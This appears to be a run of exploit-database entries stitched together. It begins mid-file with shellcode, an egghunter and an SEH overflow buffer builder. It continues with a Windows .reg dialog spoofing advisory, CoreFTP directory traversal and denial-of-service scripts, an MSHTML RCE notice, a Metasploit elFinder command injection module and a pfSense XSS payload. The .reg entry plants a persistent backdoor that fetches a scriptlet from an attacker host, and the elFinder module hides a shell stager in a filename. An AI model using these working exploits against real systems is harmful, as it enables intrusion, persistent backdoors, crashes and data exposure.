# Egghunter in printable/alphanumeric form so it survives the unicode conversion
# described at the top of the file; appended to the SEH buffer below.  Implicit
# string-literal concatenation inside the parentheses — no separators are added.
egghunter =(
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIA"
"IAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30A"
"PB944JBC6SQGZKOLO0B0RQZOSR88MNNOLKUPZSDJO6XT7NPNP3DTKKJ6OD5JJ"
"6OBUK7KOYWLJA"
)

# Register setup stub placed right after the SEH overwrite.  Per the per-byte
# comments it copies ebp into eax, adds 0x11001400 and subtracts 0x11001300
# (net +0x100), then pushes eax and returns into it.  The single-byte
# "nop/align" entries keep the unicode byte pairing intact.  Implicit string
# concatenation — no separators are added between the literals.
regPrep = (
    "\x63" #nop/align
    "\x55" #push ebp
    "\x62" #nop/align
    "\x58" #pop eax
    "\x62" #nop/align
    "\x05\x14\x11" #add eax, 0x11001400
    "\x62" #nop/align
    "\x2d\x13\x11" #sub eax, 0x11001300
    "\x62" #nop/align
    "\x50" #push eax
    "\x62" #nop/align
    "\xc3") #ret

# Layout of the SEH overflow buffer (payload1.txt), assembled in one join
# instead of incremental "+=" concatenation.
#0x00590058 : pop ebx # pop ebp # ret 0x08 | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [netsetman.exe]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.7.1.0 (C:\Program Files\NetSetMan\netsetman.exe)
buffer = "".join((
    "\x61" * 75,    #junk
    "\x62",         #nop
    "\x58\x59",     #SEH overwrite to pop-pop-ret instruction (address above)
    regPrep,        #register setup stub
    "\x62" * 108,   #offset to egghunter
    egghunter,
))

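#Write initial SEH overflow payload + egghunter with venetian shellcode.
# `with` closes each handle even if the write raises, which the original
# open/write/close sequences did not guarantee.
with open('payload1.txt','w') as f:
    f.write(buffer)

#Egg + alphanumeric encoded shellcode payload
with open('payload2.txt', 'w') as g:
    g.write(shellcode)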
            
[+] Credits: John Page (aka hyp3rlinx)		
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
[+] ISR: ApparitionSec          
 

[Vendor]
www.microsoft.com


[Product]
A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values.
.reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry.


[Vulnerability Type]
Windows .Reg File Dialog Box Message Spoofing


[CVE Reference]
N/A


[Security Issue]
The Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user.
This can potentially trick unsavvy users into choosing the wrong selection shown on the dialog box. Furthermore, we can deny the registry editor
its ability to show the default secondary status dialog box (Win 10), thereby hiding the fact that our attack was successful.

Normally when a user opens a .reg file UAC will launch (if the user is running as Admin); if targeting a non-privileged user we can still hijack HKCU reg settings
without having to deal with UAC. After they will get the registry security warning dialog box asking them if they "trust the source" and
"Are you sure you want to continue?" etc and will also have a choice of either 'Yes' or 'No' to select from.

However, we can inject our own messages thru the filename to direct the user to wrongly click "Yes", as the expected "Are you sure you want to continue?"
dialog box message is under our control. The registry dialog echoes back the filename plus any text we add and allows us to terminate part of its
default security warning message. We achieve this using % encoded characters in the filename like %n or %r and %0.

Example, the "do not add it to the registry" and "Are you sure you want to continue?" default warning messages can be done away with using %0.

This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes" or whatever else we like.
Potentially making a user think they are cancelling the registry import as the security warning dialog box is now lying to them.

Denial of secondary registry editor status dialog box (hiding successful attacks) in Windows 10:
------------------------------------------------------------------------------------------------
Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us
"the keys and values contained in <REGFILE> have been successfully added to the registry".

We can obstruct that behavior to deny this secondary registry editor dialog from appearing by tacking on a (null) right before the
end of our filename using %1 or %25 like: "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

If you don't want to use (null), use %3 instead; it will display an Asian character but still prevents the secondary registry dialog box.
You will have to manually refresh the registry written to in order to see the values stored when using these dialog denial of service methods.

Note: Denial of the secondary dialog box seems to only work on Windows 10.

Behaviors I discovered playing with registry filenames that affect the dialog box, depending on Windows OS version you will get different results.

% - can be used for obfuscation e.g. %h%a%t%e = hate
%b will create white-space
%n makes a newline
%r makes a newline
%1 creates (null) - important as we prevent the second registry dialog from appearing after a successful import!
%0 Important terminates string
%25 (Windows 10) creates (null) - Important as we prevent the second registry dialog from appearing after a successful import!
%3 - Important as we prevent the second registry dialog from appearing after a successful import! (but shows asian char)
%5 (Windows 10) duplicates the default registry dialog box message by "n" amount of times per amount of %5 injected into the filename 
%25 (Windows 7) duplicates the default registry dialog box message by "n" amount of times per amount of %25 injected into the filename 
%2525 prevents registry editor from opening
%169 will show our junky filename in the dialog box (we don't want that)
%3, %197, %17 and some others change the default language shown in the registry dialog box to asian characters etc

Each injected character can be separated by a percent "%" sign without messing up our spoofed message, we can leverage this to obfuscate the end of the filename.
We then use %0 to terminate the message string so that the second .reg extension and default registry messages are not displayed in the registry dialog box.

The filename "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" will show as "Microsoft-Security-Update-v1.2-Windows-10.reg"
in the registry dialog box, along with our spoofed user directions.
 
While this spoofing vulnerability requires user interaction and bypassing the Windows UAC prompt (if targeting Admin) to succeed, the fact that we can prevent secondary
registry dialogs and modify registry messages displayed to the user makes it a viable attack vector. If we are successful in our attack we can achieve a persistent
RCE backdoor all while the user thinks they have aborted the import. Moreover, targeting a non privileged user allows us to hijack programs and not worry about UAC.


[POC Video URL]
https://vimeo.com/322684636


[Exploit/POC]
Persistent Remote Code Execution Backdoor: 

This will add entry to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe"
for a persistent rundll32 payload targeting MSIE that references a JScript XML based file on our remote server.

1) Create a Windows .REG Registry file named.

"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

Registry file Contents.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"debugger"="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:http://<ATTACKER-IP>/backdoor\")"


2) Create an XML file hosted at http://ATTACKER-IP/backdoor named simply as "backdoor" will execute Windows calc.exe when Microsoft Internet Explorer is launched.

<?xml version="1.0"?>
<!-- Scriptlet fetched by the rundll32 "debugger" value above via GetObject("script:...").
     The JScript inside the CDATA block is what runs on load; here it launches
     calc.exe as the demonstration payload. -->
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
new ActiveXObject("WScript.Shell").Run("calc.exe"); 
]]>
</script>
</component>
</package>



[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
Vendor Notification: March 1, 2019
MSRC Response: " A registry file was created with the title you suggested, but the error message was clear."
Then vendor sent me a link pointing me to the "Definition of a Security Vulnerability" Lol.
March 10, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
            
# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674  MDTM Directory Traversal
# Google Dork: N/A
# Date: 3/13/2019
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.coreftp.com
# Software Link: http://www.coreftp.com/server/index.html
# Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
# Tested on: Windows 7
# CVE : CVE-2019-9649

*Vendor has confirmed vulnerability and implemented an updated version*

Summary: By utilizing a directory traversal along with the FTP MDTM command, an attacker can browse outside the root directory to determine whether a file exists, based on the returned file size and the date the file was last modified, by using a ..\..\ technique.
Tools used:
Parrot OS VM
Windows 7 VM
FTP / SFTP Server v2 - Build 674
Netcat

Proof of Concept (PoC):

File 1: ARP.exe
Type of file: Application(.EXE)
Description: TCP/IP Arp Command
Location: C:\Windows\System32\
Size: 20.5 KB (20,992 bytes)
Size on disk: 24.0 KB (24,576 bytes)
Created: Monday July 13, 2009 7:55:11 PM
Modified: Monday July 13, 2009, 9:14:12 PM
Accessed: Monday July 13, 2009 7:55:11 PM

#nc -nv 192.168.0.2 21
(UNKNOWN) [192.168.0.2] 21 (ftp) open
220 Core FTP Server Version 2.0, build 674, 32-bit, installed 1 days ago Unregistered
USER anonymous
331 password required for anonymous
PASS anonymous@
230-Logged on
230
MDTM C:\..\..\..\..\..\..\Windows\System32\ARP.exe
213 20090713211412
            
# Exploit Title: Core FTP 2.0 build 653 - 'PBSZ' - Unauthenticated - Denial of Service (PoC)
# Date: 2019-03-12
# Exploit Author: Hodorsec (hodorsec@protonmail.com / hodor@hodorsec.com)
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://coreftp.com/server/download/archive/CoreFTPServer653.exe
# Version: Version 2.0, build 653, 32-bit
# Tested on: Windows 8.1 6.3 (build 9600)
# CVE: N/A

# Description: 
# CoreFTP 2.0 is vulnerable to a DoS attack via the PBSZ command. Ironically, this command is being used for "Protection Buffer Size" 
# and CoreFTP responds unauthenticated.
# The PBSZ command in CoreFTP only allows for a certain length of the string to be vulnerable to a DoS.
# This script triggers the DoS and fills ECX with the intended buffer. 
# Although NSEH/SEH is overwritten, the executable binary is SafeSEH protected and no other assemblies are referenced.

# Replication:
# - Install CoreFTP and setup a domain with an IP and path
# - Start the service or click "Start"
# - No need to add users or set anything specific: just run the script and watch it crash

# Crash as service:
# (7e0.bf4): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\CoreFTPServer\coresrvr.exe
# eax=00000000 ebx=00a5b048 ecx=42424242 edx=00000000 esi=00000258 edi=00000000
# eip=004491f5 esp=0128c4bc ebp=0129f684 iopl=0         nv up ei ng nz na po nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010282
# coresrvr+0x491f5:
# 004491f5 83b92c08000000  cmp     dword ptr [ecx+82Ch],0 ds:002b:42424a6e=????????

#!/usr/bin/env python
import sys, socket, struct, time
 
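# Total length of the PBSZ argument that still reaches the faulting compare
# (see the crash dump above); longer arguments do not hit the bug.
MAXLEN = 211

# Offsets into the argument:
#   CRASH_ECX  - bytes before the 4 that land in ECX at 004491f5
#   CRASH_NSEH - bytes before the nSEH overwrite (kept for reference only;
#                the binary is SafeSEH-protected so it is not used here)
CRASH_ECX = 199
CRASH_NSEH = 99


def build_payload(maxlen=MAXLEN, crash_ecx=CRASH_ECX):
    """Build the PBSZ argument: filler, 4 bytes that end up in ECX, padding.

    Args:
        maxlen: total argument length to send.
        crash_ecx: offset of the 4 bytes that are loaded into ECX when
            `cmp dword ptr [ecx+82Ch],0` executes.

    Returns:
        A str of exactly `maxlen` characters.

    Raises:
        ValueError: if the ECX slot does not fit inside `maxlen`.
    """
    if crash_ecx + 4 > maxlen:
        raise ValueError("crash_ecx + 4 must not exceed maxlen")
    prefix = "A" * crash_ecx
    ecx = "B" * 4                                   # 004491f5; CMP DWORD PTR DS:[ECX+82c],0
    suffix = "C" * (maxlen - len(prefix + ecx))
    return prefix + ecx + suffix


def main(argv=None):
    """Send one crafted PBSZ command to [host] [port] and report the result.

    Works under Python 2 and 3 (print() with a single argument, bytes on the
    wire, `except ... as`). The socket is always closed, even when the
    server drops the connection.
    """
    argv = sys.argv if argv is None else argv
    if len(argv) <= 2:
        print("Usage: python " + argv[0] + " [host] [port]")
        sys.exit()

    host = argv[1]
    port = int(argv[2])
    payload = build_payload()

    print("[+] Connecting to " + host + "\n")

    sock = None
    try:
        print("[+] Sending payload with " + str(len(payload)) + " length message...")

        # No CRLF terminator, mirroring the original PoC.
        req = "PBSZ " + payload

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(2)
        sock.connect((host, port))
        sock.send(req.encode("ascii"))
        # A crashed service yields a timeout or reset here, which the
        # handler below reports as the crash.
        sock.recv(1024)

        time.sleep(0.5)
    except Exception as e:
        print("[!] Error occured: " + str(e))
        print("[*] Crashed occured at buffer length: " + str(len(payload)))
        sys.exit()
    finally:
        if sock is not None:
            sock.close()


if __name__ == "__main__":
    main()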
            
# Exploit Title:  Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execution Vulnerability

# Google Dork: N/A

# Date: March, 13 2019

# Exploit Author:  Eduardo Braun Prado

# Vendor Homepage: http://www.microsoft.com/

# Software Link: http://www.microsoft.com/

# Version: Windows 7 SP1, Server 2008, Server 2012, Server 2012 R2, 8.0, 8.1, 10 (any) with full patches up to December 2018. both x86 and x64 architectures.

# Tested on: Windows 7 SP1, Server 2008, Server 2012, Server 2012 R2, 8.0, 8.1, 10 (any) with full patches up to December 2018. both x86 and x64 architectures.

# CVE : CVE-2019-0541


The Microsoft Windows MSHTML Engine is prone to a vulnerability that allows attackers to execute arbitrary code on vulnerable systems because of improper validation
of specially crafted web documents (html, xhtml, etc). The issue is triggered when users "Edit" specially crafted documents containing a 'meta' HTML tag set to 'ProgId' and its content set to a 'ProgId' of choice eg. 'HTAFILE', usually through MS IE browser or a MS Office
component (The Edit HTML app 'msohtmed.exe'). Some Office versions will add an "Edit" menu option to html and xhtml files, making it possible to exploit the vulnerability locally or remotely (usually through network shares)
This is the 'ProgId' variant: similar to the old Windows Shell / Internet Explorer ClassId vulnerabilities that affected Windows 98/2000/XP.
On patched systems, the PoC file will always open in Notepad.


Video demo: https://youtu.be/OdEwBY7rXMw


Download PoC (in ZIP archive) with full details from: https://onedrive.live.com/?id=AFCB9116C8C0AAF4%21366&cid=AFCB9116C8C0AAF4


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46536.zip
            
# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674  SIZE Directory Traversal
# Google Dork: N/A
# Date: 4/27/2019
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.coreftp.com
# Software Link: http://www.coreftp.com/server/index.html
# Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
# Tested on: Windows 7
# CVE : CVE-2019-9648


#!/usr/bin/python

import socket
import sys

########################################################
###########Set Variables For Script Here################

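file_to_look_for = "nslookup.exe"
local_disk_drive = " C:"
# Written with doubled backslashes so the literal is unambiguous on Python 3
# (the original relied on "\." / "\W" / "\S" being left alone as unknown
# escapes). Value: \..\..\..\..\..\Windows\System32\
path_traversal = "\\..\\..\\..\\..\\..\\Windows\\System32\\"

# Target defaults; override with `script.py [host] [port]`.
default_host = "192.168.0.4"
default_port = 21

########################################################


def parse_size_reply(reply):
    """Extract the size from an FTP SIZE reply.

    Args:
        reply: raw reply bytes (or str) such as b"213 46080\\r\\n".

    Returns:
        The size as an int when the reply is a 213 with a numeric argument,
        otherwise None (error replies, empty or malformed input).
    """
    if isinstance(reply, bytes):
        reply = reply.decode("utf-8", "replace")
    parts = reply.strip().split(" ")
    # Only a 213 reply carries a size; anything else ("550 ...") means the
    # path was not resolved, whatever its second word happens to be.
    if len(parts) < 2 or parts[0] != "213" or not parts[1].isdigit():
        return None
    return int(parts[1])


def query_size(host, port, target):
    """Log in anonymously and issue SIZE <target>; return the raw reply.

    The original script sent the same USER/PASS sequence and never closed
    the socket (`s.close` without parentheses); this version always closes it.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.settimeout(10)
        sock.connect((host, port))
        sock.recv(1024)                              # banner
        sock.send(b"USER anonymous\r\n")
        sock.recv(1024)
        sock.send(b"PASS anonymous\r\n")
        sock.recv(1024)
        try:
            # The 230 login reply is two lines and may arrive in a second
            # segment; if it already came in one, don't hang on it.
            sock.recv(1024)
        except socket.timeout:
            pass
        sock.send(("SIZE" + target + "\r\n").encode("ascii"))
        reply = sock.recv(2048)
        sock.send(b"QUIT\r\n")
    finally:
        sock.close()
    return reply


def main(argv=None):
    """Print the banner, probe for `file_to_look_for` and report the result."""
    argv = sys.argv if argv is None else argv
    host = argv[1] if len(argv) > 1 else default_host
    port = int(argv[2]) if len(argv) > 2 else default_port

    print("""
         #####  #     # #######        #####    ###     #    #####         #####   #####  #        #####
         #     # #     # #             #     #  #   #   ##   #     #       #     # #     # #    #  #     #
         #       #     # #                   # #     # # #   #     #       #     # #       #    #  #     #
         #       #     # #####   #####  #####  #     #   #    ###### #####  ###### ######  #    #   #####
         #        #   #  #             #       #     #   #         #             # #     # ####### #     #
         #     #   # #   #             #        #   #    #   #     #       #     # #     #      #  #     #
          #####     #    #######       #######   ###   #####  #####         #####   #####       #   #####

          #######
          #       #    # #####  #       ####  # #####
          #        #  #  #    # #      #    # #   #
          #####     ##   #    # #      #    # #   #
          #         ##   #####  #      #    # #   #
          #        #  #  #      #      #    # #   #
          ####### #    # #      ######  ####  #   #

          #     #                                       ######         #     #    #
          #  #  # #####  # ##### ##### ###### #    #    #     # #   # ###    #   #  ###### #    # # #    #
          #  #  # #    # #   #     #   #      ##   #    #     #  # #   #     #  #   #      #    # # ##   #
          #  #  # #    # #   #     #   #####  # #  #    ######    #          ###    #####  #    # # # #  #
          #  #  # #####  #   #     #   #      #  # #    #     #   #    #     #  #   #      #    # # #  # #
          #  #  # #   #  #   #     #   #      #   ##    #     #   #   ###    #   #  #       #  #  # #   ##
           ## ##  #    # #   #     #   ###### #    #    ######    #    #     #    # ######   ##   # #    #

           ######
           #     #   ##   #    # #####    ##   #      #
           #     #  #  #  ##   # #    #  #  #  #      #
           ######  #    # # #  # #    # #    # #      #
           #   #   ###### #  # # #    # ###### #      #
           #    #  #    # #   ## #    # #    # #      #
           #     # #    # #    # #####  #    # ###### ######

           """)

    target = local_disk_drive + path_traversal + file_to_look_for
    reply = query_size(host, port, target)
    size = parse_size_reply(reply)
    if size is not None:
        print("The file " + file_to_look_for + " exist on the remote server. Here is the filesize:" + str(size))
    else:
        print("The file " + file_to_look_for + " does not exist on the remote server or one of the variables declared is incorrect.")


if __name__ == "__main__":
    main()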
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

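class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'elFinder PHP Connector exiftran Command Injection',
      'Description'    => %q{
        This module exploits a command injection vulnerability in elFinder
        versions prior to 2.1.48.

        The PHP connector component allows unauthenticated users to upload
        files and perform file modification operations, such as resizing and
        rotation of an image. The file name of uploaded files is not validated,
        allowing shell metacharacters.

        When performing image operations on JPEG files, the filename is passed
        to the `exiftran` utility without appropriate sanitization, causing
        shell commands in the file name to be executed, resulting in remote
        command injection as the web server user.

        The PHP connector is not enabled by default.

        The system must have `exiftran` installed and in `$PATH`.

        This module has been tested successfully on elFinder versions 2.1.47,
        2.1.20 and 2.1.16 on Ubuntu.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Thomas Chauchefoin', # Discovery
          'q3rv0',              # Exploit
          'bcoles'              # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2019-9194'],
          ['EDB', '46481'],
          ['URL', 'https://github.com/Studio-42/elFinder/releases/tag/2.1.48'],
          ['URL', 'https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/']
        ],
      'Arch'           => ARCH_PHP,
      'Platform'       => 'php',
      'Targets'        => [['Auto', {}]],
      'Privileged'     => false,
      'DisclosureDate' => '2019-02-26',
      'DefaultTarget'  => 0))

    register_options [
      OptString.new('TARGETURI', [true, 'The base path to elFinder', '/elFinder/'])
    ]
  end

  #
  # Check if /php/connector.minimal.php exists and is executable.
  #
  # Returns CheckCode::Unknown when the host does not answer, CheckCode::Safe
  # when the connector is missing or is served as raw PHP source (no PHP
  # handler), and CheckCode::Detected otherwise. Only the connector's
  # presence is established here; the elFinder version is not probed, so
  # Detected does not by itself prove the target is vulnerable.
  #
  def check
    uri = normalize_uri(target_uri.path, 'php', 'connector.minimal.php')
    res = send_request_cgi('uri' => uri)

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.code == 200
      vprint_status "#{uri} does not exist"
      return CheckCode::Safe
    end

    # Raw source in the response body means PHP is not executing the file.
    if res.body.include? '<?php'
      vprint_status 'PHP is not enabled'
      return CheckCode::Safe
    end

    CheckCode::Detected
  end

  #
  # Upload PHP payload.
  #
  # Uploads a small JPEG, with the PHP payload appended after the image data,
  # under the attacker-chosen file name `fname`; the file name itself is the
  # injection vector (see #exploit). Returns the elFinder hash of the new
  # file, or '' when the reply carries no hash. Fails the module on any
  # transport error or unexpected connector reply.
  #
  def upload(fname)
    # Small JPEG file from:
    # https://github.com/mathiasbynens/small/blob/master/jpeg.jpg
    jpeg = %w[
      FF D8 FF DB 00 43 00 03 02 02 02 02 02 03 02 02
      02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05
      06 09 08 0A 0A 09 08 09 09 0A 0C 0F 0C 0A 0B 0E
      0B 09 09 0D 11 0D 0E 0F 10 10 11 10 0A 0C 12 13
      12 10 13 0F 10 10 10 FF C9 00 0B 08 00 01 00 01
      01 01 11 00 FF CC 00 06 00 10 10 05 FF DA 00 08
      01 01 00 00 3F 00 D2 CF 20 FF D9
    ]
    jpeg = [jpeg.join].pack('H*')
    # Random padding on both sides of the PHP block, so the upload does not
    # carry a fixed signature.
    jpeg << rand_text_alphanumeric(50..100)
    jpeg << "<?php #{payload.encoded} ?>"
    jpeg << rand_text_alphanumeric(50..100)

    data = Rex::MIME::Message.new
    data.add_part('upload', nil, nil, 'form-data; name="cmd"')
    # 'l1_Lw' is the connector's hash for the upload target directory
    # (presumably the root of the first local volume); confirm against the
    # target if uploads land elsewhere than `files/`.
    data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
    data.add_part(jpeg, 'image/jpeg', nil, %(form-data; name="upload[]"; filename="#{fname}"))
    post_data = data.to_s

    print_status("Uploading payload '#{fname}' (#{post_data.length} bytes)")

    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'php', 'connector.minimal.php'),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    )

    unless res
      fail_with Failure::Unreachable, 'Connection failed'
    end

    unless res.code == 200
      fail_with Failure::UnexpectedReply, 'Unexpected reply'
    end

    unless res.body.include?('"added"')
      fail_with Failure::UnexpectedReply, "Upload failed: #{res.body}"
    end

    if res.body.include?('"error"') || res.body.include?('"warning"')
      fail_with Failure::UnexpectedReply, "Upload failed: #{res.body}"
    end

    json_res = JSON.parse(res.body) rescue nil

    # The substring check above only proves '"added"' appears somewhere in
    # the body, not that the key is present and is an array, so coerce it
    # before calling #empty? / #first (a bare nil would raise NoMethodError).
    added = json_res.nil? ? [] : Array(json_res['added'])

    if added.empty?
      fail_with Failure::UnexpectedReply, "Upload failed: #{res.body}"
    end

    first = added.first
    return '' unless first.is_a?(Hash)

    first['hash'] || ''
  end

  #
  # Trigger the command injection via image rotation functionality.
  # Rotates image by 180 degrees to trigger `exiftran` code path.
  #
  # `hash` is the elFinder hash returned by #upload. The short (5 s) timeout
  # is deliberate: the stager backgrounds itself (`sh&`, see #exploit), so
  # the rotate request is expected to return promptly.
  #
  def trigger(hash)
    print_status 'Triggering vulnerability via image rotation ...'

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'php', 'connector.minimal.php'),
      'vars_get' => {
        'target' => hash,
        'degree' => '180',
        'mode'   => 'rotate',
        'cmd'    => 'resize'
      }
    }, 5)

    unless res
      fail_with Failure::Unreachable, 'Connection failed'
    end

    if res.body.include?('"error"') || res.body.include?('"warning"')
      fail_with Failure::UnexpectedReply, "Image rotate failed: #{res.body}"
    end
  end

  #
  # Delete uploaded file.
  #
  # Best-effort removal of the uploaded JPEG through the connector's `rm`
  # command; failures are reported but never abort the module, since this
  # runs from #cleanup.
  #
  def delete_file(hash)
    print_status 'Removing uploaded file ...'

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'php', 'connector.minimal.php'),
      'vars_get' => {
        'cmd' => 'rm',
        'targets[]' => hash
      }
    }, 15)

    unless res
      print_status 'Connection failed'
      return
    end

    if res.body.include?('errFileNotFound')
      print_error "Could not delete uploaded file. Unexpected reply: #{res.body}"
      return
    end

    print_good 'Deleted uploaded file'
  end

  #
  # Execute payload.
  #
  # Requests the dropped `php/<php_fname>` so the web server runs it. A
  # missing reply is not fatal (a payload that never returns, e.g. a
  # reverse shell, looks like that); a non-200 status is.
  #
  def execute_payload(php_fname)
    path = normalize_uri(target_uri.path, 'php', php_fname)

    print_status "Executing payload (#{path}) ..."

    res = send_request_cgi({
      'uri' => path
    }, 15)

    unless res
      print_status 'No reply'
      return
    end

    unless res.code == 200
      fail_with Failure::UnexpectedReply, "Executing payload failed (HTTP #{res.code})"
    end
  end

  #
  # Remove uploaded file.
  #
  # The JPEG is removed through the connector here; the dropped .php file is
  # handled by FileDropper (registered in #exploit) via the session.
  #
  def cleanup
    delete_file @hash unless @hash.nil?
  ensure
    super
  end

  #
  # upload && execute
  #
  def exploit
    unless check == CheckCode::Detected
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    fname = rand_text_alphanumeric(6..10)
    php_fname = ".#{rand_text_alphanumeric(6..10)}.php"

    # Max file name length is ~250 characters
    # and characters such as `/` are forbidden.
    # Hex encoded stager copies the uploaded file from the `files` directory
    # to the working directory (`php`) and changes the extension to `.php`
    # The stager is decoded with xxd when the vuln is triggered.
    # `*echo*` globs the uploaded name, which carries the injection text.
    stager = "cp ../files/#{fname}.jpg*echo* #{php_fname}"

    # Upload our payload jpg file with encoded stager in the filename
    jpg_fname = "#{fname}.jpg;echo #{stager.unpack('H*').flatten.first} |xxd -r -p |sh& #.jpg"
    @hash = upload jpg_fname

    if @hash.to_s == ''
      fail_with Failure::Unknown, 'Upload failed: Failed to retrieve file hash ID'
    end

    trigger @hash

    register_file_for_cleanup php_fname

    execute_payload php_fname
  end
end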
            
# Exploit Title: pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Stored Cross-Site Scripting 
# Date: 13.02.2019 
# Exploit Author: Gionathan "John" Reale 
# Vendor Homepage: https://www.pfsense.org 
# Version: 2.4.4-p1/0.59_14 
# Software Link: N/A
# Google Dork: N/A
# CVE:2019-8953 

################################################################################################################################## 
Introduction: pfSense® software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via a web interface. 
In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. 
HAProxy is free, open source software that provides a high availability load balancer and proxy server for TCP and HTTP-based applications that spreads requests across multiple servers. 
################################################################################# 

Example: URL https://192.168.1.1/haproxy/haproxy_listeners_edit.php 
PARAMETER Description 
PAYLOAD "><script>alert("test")</script>